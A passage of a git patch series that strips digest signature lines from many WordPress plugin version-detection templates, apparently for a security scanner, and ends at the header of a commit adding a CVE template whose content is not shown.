'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c695c832a868cbe72dcc82923ba74657f55aa7ad0786000120dde442ed8e258022100cfded329340b7c2222069c916b1a178d35feeb4d0c104a02fbdd3bde04858a7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 91be77ad83..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b617651eb78c0b3dff70edf912d4fd07f296e9a5b91551b0cf022fd3222029860221009f491a4e440d57b021e897b1ea8d02683eec38910f9828cf68a40db26b802c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index f73a5ede60..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce7f5749050cd139464bfa8f5498b0f9340c44de2391d47d3ce196a7a14a3aa8022100d99a7119c53691eb2c2bac7fcdf2740be683eebac3c67dccdcde20b7137ccc00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 3a5202fe57..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a29e03526612147d5de1447a8a0d3ccee414f48edcaebba126d2e8cda68ad27022100c4632d5f277a0427276b0c1ba26c1727570e4f7467d8a8b8879843985c81f866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 611ea6eda4..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089c305c27584af7d6a9e516db1c00aa4b9ca4f93e5f2e38abf100223339c46e602200ff0dc892704bf29d73a3e39efb6f5f2591756bd9af80ca08a196727c05eec38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 0dbfa4f513..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fdfe5517592d988c0174c9ed1237aa711bc52d7b2e67d53c6b1e9e03d8c6b5b022100d21b77e1520d7751aa80d6f6377f892f0062ea74ddf3effe33bb1f1c427c853a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index e9bd6e0d32..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022011d8ad271ff5e80a74f4f6df8dc0fef2ed657b87cc13493046ddd38f7027287e0221009a9ccc25537a392a838f7bcf4662640c0c44471b99676b7fbb80e3aea1f3ee61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 9c48339eaf..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e003466dd4b8a0fdcbd849b5b4192b3773269d6a26567b0f5bbff46a6727225a022055b9ddab3768587a287436d798b2e2e2c3f708770482d403f672a89afd22af3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 1eb7f725fd..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da877dd45fc3c9beae4554efcd0ed8b9c1d93a129eefdbf92bda73ac950b8bf6022100b52b075ac483cc2ce86269ab03831221fbd64e9e0099dc4a2094217a9b7c6daa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2a4bc800ac..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202deadacf1546dc1491904d713a2fc8566209b23316a777d8188baa6b4ef76189022100e903e4a773e2ada4f298d861854d01a997cb933fceabeb30e7b6f77f1646961f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 7a4a705fac..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f027d30d29e5e6fcdf4e60da2032cbe8a1858f8b1f7d897decc465c16f91455f02207ed86ec68a1da071d13963d05a94cacc1ac8898abf0b65daf6348a04b89f478d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index e4c58ee6dd..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054d3d7d789702d7724007303f480616e23e162d9b231cde99c39c879236feecf0220379fdb01748cf0df4e377deea5814975fc9f10f97ac16ea03ed2ff2e5c7f0b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 3717c4f519..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcaed14c3ce2abc52d72126d12602f3c6ba0f4b9d6537ba3a30384801e44ddd102206d74f81efc4d035514d94daf27fba2f77b7db72546bb144d51f7a9a51a10e10c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 4b0fcd6632..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202445ee6834c1a10c2e4b5406aaed70d6b5204b8ced5b014e1f063cddf827419a022100a6408caa6e6d5a4f3df4d0e322a11cb96e6c61e7c6b0fc00acc82c59346532e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 592d949843..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c5ddf64553dc9a1bcbe8d2862af4a67411c6d1e0ab76203b5d917a1da57f4fd02200893190b3af0bdb388d6c34633aca15dfd7cc6b333de629875a74adb7d6a1900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 89801f1719..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098c4bc1e6649186b7d58bee8b44838d5dc0d13a16c2aebd76fa5cef32eff1219022100e54bed3638124a1e0c9cee5ffa051f8c9ec8578f2b2d8ca35e77f8c899fa4bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index eb3a255d13..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009be3a2e50f2f7d817138811eaece96ffa812e0f7d4d1ae0a197bcfb9386638f9022100eeafde8f08e9f02f836503b80c14c0715eb82f27addeee18d006b7376e454a7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 953b4701aa..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0c5250b290fab0bb1037f04cb3ea850503f24099b57dd319ffc4722dd8b8edc0221009fb5028b007afec46174b57616257a8a6bddf7c37ab0b66d724206c5f74478cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index aaaf2c14ba..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b64710284c7b4093f92de278848103515c98b3164cf81e421bfc966c123a362c022015a6f1345a8715cfe6724a5c78a7fb4a057e0b2fb41b71dd21db81f5f1fc4a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 835f222d21..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dca100dd3516691be50643447911830bf261b0ad1e289dfd55cb4bd5168128e30221009cdb7b09deab97f4b3492749eced8e908362368b77771048e571fa590a46ffa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index d9ab0cea26..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203dc1be1cf7b60b19373c8a9e0a080181a1dd8e764d53dafae862fb805fd4f4580221009c14b262bccf522b56ceaf43d77f63f0ca4b1787d58fb41eba94a4e32ff4cfb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 1ebf0859e6..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5e8e07a621b1d656258da62e2d50de2b942e3a8715a33a11d658c37726c0405022045705679a049fae7dbf3229c8bc6a9ae8931eaceba4b32db76c33b8129abded5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 41072d886d..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c1595ad16d75f5530adcdcc3c55545e0775283d16f8ec66acfc1711a5d765ecf022100e0a85162a5e0d6017203504d2fa7f48a9a1faf039982b3e9489a388625f88e2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 6389a8bc57..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009ffa0331d6ccb94a46a1512588b862e740e480e9865547a5b8e2942b26923ba4022079d2dff5f7f0443511f3c6c4d3f6c44e45c2b049617fddbfc90c9bf8e5e0de08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index ac1e3db25c..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022052607f625c2a54d9e8c57f940c19f0a25f11dc0389ec42f2c66b42c74d060ae4022100f887b6b626509797b2e7ac36b03bb4800f1afa604cb824e014a906f5fca747ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index c24b5d21a0..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207fda854568dc0da78d351dd5aad3827c4a79c4d642900060aa02e348742dd039022019ed28adfb1dd50996bd06746ccffab9257ee521e51687d3598ee867f119d9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 6b1e815828..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220126d9477fd53b7b7e19df5e581b49747040d23bc91debd0eb3e9b81339deffd402205ff2a5a86df0d97536ef97594805ebfa56b98a28b48d3d1398b782e6e0572af2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 218e28ad75..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207cda32728e2c0c9a64c2cdc3010321fb0990a6046990ce29d61e852434d3fc4002207f2c0b47dcd1084b4165b20cb7aebbf3bde627937203cbfd4ed8709d11195bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 14d1c448e1..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009e7ae0522c46939c910ffe5d7bb35f8ca8675923c44afe0e40f64e586e57b36f022078e6d6048c2c0004b61aab58d5bff7df5005c3845eeb017e8071c966f0b4994a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 32581070c5..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee0450fd8c3494f057d7d0df96787f91ce9b2744c955d0ee31cba0543efaddc80221009c8d1e47a9ca37d610920ffec953f6400dd975997b1c41eaaa1fc7f9dfc9b9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 265aed919a..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d57492efb2dc71af930a89d81c86f0acb4c3e1ab5e5801833dc4b9cb247027f02207fa591bb0bf8ae067512038f601459fd579f6770602625638033cd6c897983a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index fc101d1666..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079c3a183f1bf5c90aee2883e58a56c529bac98e4780f85b95cae581b0a4a199802206c3a93e9191bd99656616e64dd19ad1988db0aee5e833a9df070377783384d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index e4d5ca5f58..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009de265a21fd1cfa2dbdea67cf122cd3d97aa97679d91e69bcce9cf759ff36a32022100bc388d718a4d1141764bd5218bab4f8cf44dc9c55275c934e1dc810a7d2c0150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 3eab30cc1e..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b7baf4608736fb9de48fa8d558a802aed6b7c1ff7e59cae95145c9e7cb9c5833022100eca4f5943fbb1719e90566271a220db6d2aeeb13c66ab6edd74ebbda98d7412c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 325b6b8f9a..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a54aa1120135128c1b6deb515c7a2bf9e9d279ed8fc03caba4d7aafc6dc1d4b6022100ef3953ffa3f115cd2549286a822cae7bb6a06f0d9eb6f8b3bc6e25093b9d8e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index d01c0e45b7..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201891ade1c4c8bcab643fc8a9c2126b33a2fb85296a1016f3c9e8e29732497e66022100b82e35113ba537cc15b3bc7886dbf95b57506d2c22ec8a03edd7422518cbf9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index b6e65a2802..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe14a841b70b282aa91ec1cb90df8889b67316974a356200c2fff0195ef7913502207b85eecc380701a50702a9152aeb9e55bdb4bd00f2bfc36ad79543e4e2658888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 55e4504055..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d76ba9c29fd22e390cd1dc6b6637e4aeb4207c6dbda1145f3c111584e08c1512022020b9f2e24c14ef6fe41afbe7ae9432f683f921681c7feda5b3d35fe36c3feb1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 41c442ea8b..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022056d04f533aeb70f19298af5b94210e048f71e47d37a6d6b0a7e14eac359cf7d50221009ba395fae3faf1e68ef0066ce219b240bb50eb99aa987f8f11dae0d140f6241b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 4d84b83959..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afb6370fb2c25e23426c92c350f17b5e9c1e6922f26234472cbe9e918234064602206161d3c9221c064b8ba29a7c63f69ad1e6d92a2e87be1be1052a0b77a79dfd80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 46bc961f63..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022e26a9f5edeb00b81f2baf7ab7cb3c45f6b27cbb58e71fd62e2da79fb2b125b02201a1e1b63474ade9b0db69bb370fd624b2c2b315cf185d802b81b410a55b70225:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index fde9156a1b..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204f519ad84f9f1cedb1d9dc4b7f611ca0808ccbd760d24e858e5ee6ebf6f90530022100e53a6acdba095636439eb80b32fa2a9d670896e7222da9ae66a4a4a7d4842439:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 672b633ef3..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3feef35c28392554cdf4cde9cc94ca00441908a620f56436a7bdce5608b831702206f38a95595d44a8743411e254ebb566ac249cdb2b4708784c55630ac5bd955f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f9208efbbc..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220242948788c07649d5ef9422002d3a126ad9f62a94ecf067b394d3da46ec0e344022100918cc34b925efd68efc9fb7941e4833f9d14253d268e9a044dd83ccf63d8c3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index ea94e50d2a..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220273156852321bb930d037d24a68ca6dfc4cc0dc2a67654666830c4505f4c2bd402206b45310252f79365f761f602bdfeab244f5d15d6e1a9c61f38adc4b7cd40ff3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4bc9c5162e..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220266cb7cd491ddbfadedc3137368b9dcd802103250507553d706356f0bc78d3c002201d070ddf787e4a0ee82fdb2b80d0ad019c0a2909f93fe825cb92675dca408c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0ae7c00cb1e43e29549186acaaf7240bda129bc0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 27 Jul 2024 12:02:50 +0530 Subject: [PATCH 1684/1841] Create CVE-2024-6396.yaml --- http/cves/2024/CVE-2024-6396.yaml | 68 +++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 